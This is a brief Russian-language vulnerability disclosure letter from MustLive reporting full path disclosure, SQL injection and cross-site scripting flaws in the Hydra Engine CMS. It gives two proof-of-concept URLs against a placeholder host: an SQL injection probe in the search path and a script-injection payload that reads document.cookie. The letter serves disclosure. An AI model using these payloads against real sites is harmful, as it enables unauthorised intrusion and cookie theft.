Здравствуйте 3APA3A!
Сообщаю вам о Full path disclosure, SQL Injection и Cross-Site Scripting уязвимостях в системе Hydra Engine. Это украинская CMS.
Full path disclosure:
SQL Injection:
http://site/search/'%20and%20version()%3E5--%20/
XSS:
http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/
О данных уязвимостях я упомянул у себя на сайте (http://websecurity.com.ua/3453/).
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua